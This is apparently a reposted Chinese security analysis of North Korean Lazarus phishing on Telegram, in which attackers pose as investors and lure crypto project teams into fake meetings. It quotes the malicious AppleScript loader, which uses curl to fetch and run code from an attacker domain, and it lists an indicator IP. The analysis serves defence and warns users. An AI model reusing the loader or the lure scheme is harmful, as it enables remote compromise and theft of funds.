朝鲜黑客 Telegram 定点欺诈攻击分析_全球资讯热分享网(专注热点收集平台)

朝鲜黑客 Telegram 定点欺诈攻击分析


朝鲜黑客 Telegram 定点欺诈攻击分析

  2023-12-07 23:15:08     简体|繁體
http://refenxiang.com/1014009.html

背景

早在 2022 年,慢雾安全团队就通过慢雾 BTI 情报网络发现朝鲜黑客 Lazarus 团伙开启针对加密货币行业的大规模 Telegram 欺诈钓鱼行动,近期朝鲜黑客更是开始冒充知名投资机构,对项目方进行欺诈钓鱼,鉴于影响范围较大,慢雾在此进行分析。

技战法

一、挑选知名投资机构作为冒充对象,然后建立虚假的 Telegram 帐号:

二、寻找知名的 DeFi 项目方作为目标,以要投资他们为名,使用虚假帐号开始实施骗局:

朝鲜黑客会先对目标发起聊天以建立联系,如果项目方看到消息且安全意识不足,就会出现下图的一幕:

朝鲜黑客骗取项目方的信任后便开始约会议,此处有两种攻击手法:

1. 邀请项目方加入如 ***.group-meeting.team 之类的会议,假装询问对方是否有时间安排会面或详谈,并主动提供恶意会议链接。项目方点击链接后会看到地区访问限制,这时朝鲜黑客会接着诱使项目方下载并运行其提供的“修改定位”的恶意脚本。一旦项目方照做,那么他的电脑就会被朝鲜黑客控制,导致资金被盗取。下面是恶意脚本 IP_Request.scpt 的内容:

set fix_url to "https://support.group-meeting.online/778188/request-for-troubleshooting"

set sc to do shell script "curl -L -k""& fix_url &"/""

run script sc

代码解释:

2. 利用 Calendly 会议预定系统的“添加自定义链接”在事件页面的功能,在事件上插入恶意链接发起钓鱼攻击。由于 Calendly 与大多数项目方的日常工作背景很好地融合在一起,因此这些恶意链接不容易引起怀疑,项目方容易无意中点击恶意链接,下载并执行恶意代码,此时朝鲜黑客同样可以获取到项目方系统相关信息或权限。

慢雾安全团队在 2023 年 11 月 30 日 也对相关攻击手法做过提醒:

基础 IOC:

IP: 104.168.137.21

Domains:

恶意攻击样例:

总结

鉴于此类诈骗行为仍在持续发生,建议 Web3 用户务必确保在添加好友时通过双重渠道确认对方的真实性,同时对 Telegram 开启双重身份验证(2FA),随时注意交易安全,以免遭受资金损失。

一旦不慎运行相关木马,请第一时间转移相关资金、断网杀毒,同时修改目标电脑上(包括浏览器里记录的)相关账号密码等信息。



编辑:web3528btc 来源:加密钱包代币

分享到:

  • 上一篇
    下一篇

  • 分享知识|收获智慧

    全球资讯热分享网(专注热点收集平台)
    手机查看(二维码扫一扫)

    全球资讯热分享网,最有影响力热点信息分类网站,主要集合图文、知识、日常、娱乐、财经、文化、生活、致富、女性、地区、科技等多类信息分享交流,免费提供最有价值的头条信息平台。
    « 2026年 » « 04月 »
    12345
    6789101112
    13141516171819
    20212223242526
    27282930

    最新资讯

    我是头条网络的运营推广尹玉蝶,[开户]短信获客方式,大健康,精准粉。,我们是推广代运营服务商,欢迎点击对接合作与我联系。
  • 2026-04-01 21:08:21

     

    我是昆山头条的市场推广曹铭,[开户]短信获客方式,大健康 免领粉渠道,我们是推广代运营服务商,欢迎点击对接合作与我联系。
  • 2026-04-01 20:59:17

     

    我是重庆佳禾东的负责人刘松果,[开户]大健康、生活美容订单粉,也可定制,欢迎对接,我们是甲乙双身份服务商,欢迎点击对接合作与我联系。
  • 2026-04-01 20:50:14

     

    护生命高质量发展,助健康舒适同行——第十届中国麻醉周透视手术室里的“幕后英雄”
  • 2026-04-01 20:41:10

     

    我是江西恒新的商务经理罗相信,[开户]oppo vivo信息流流量,微压南瓜锅,扫地机,睡眠仪百货粉有量 需要联系,我们是广告媒体方,欢迎点击对接合作与我联系。
  • 2026-04-01 20:32:07

     

    我是恒新的运营总监王娜,[开户]oppo vivo百货流量,扫地机器人,微压锅有量 需要联系,我们是广告媒体代理商,欢迎点击对接合作与我联系。
  • 2026-04-01 20:23:03

     

    我是云南讯海的销售股问颜梦,[开户]四季养生书,日百免领,小护士等仪器大健康粉,日供2000+,AI剪辑AI漫剧等,我们是乙方综合性服务商,欢迎点击对接合作与我联系。
  • 2026-04-01 20:14:00

     

    我是精准起量的渠道总监杨盛航,[开户]本地推、百度(baidu)招商加盟的全国高点开户及代运营服务,我们是乙方综合性服务商,欢迎点击对接合作与我联系。
  • 2026-04-01 20:04:56

     

    我是三五聚合的市场推广黄涛,[开户]本地推线索公9 私12 团购公11 私14 千川私 4.5 想包黄红牌开侠客行 对私3 稳定收量,我们是广告媒体代理商,欢迎点击对接合作与我联系。
  • 2026-04-01 19:55:53

     

    疾控预警!登革热+基孔肯雅热双风险升级,万孚生物多病同防方案筑牢防线
  • 2026-04-01 19:46:49

     

    爱尚丽格出席上海整形科技周,杜园园教授携博士团队演示疑难眼修复手术
  • 2026-04-01 19:37:46

     

    失眠不是简单的睡眠问题,而是大脑亚健康,90%的人都忽略了这一点
  • 2026-04-01 19:28:42

     

    《镁与中国全民健康白皮书》发布,LOSOKI以精准营养破解缺镁困局
  • 2026-04-01 19:19:38

     

    尼妥珠单抗联合免疫在复发/不可切/转移性头颈鳞癌中疗效显著,p16状态或成关键疗效预测因子
  • 2026-04-01 19:10:34

     

    安逸花逾期了不接电话会怎么样?会爆通讯录吗?会上门吗?会起诉吗?附应对方法!
  • 2026-04-01 19:01:31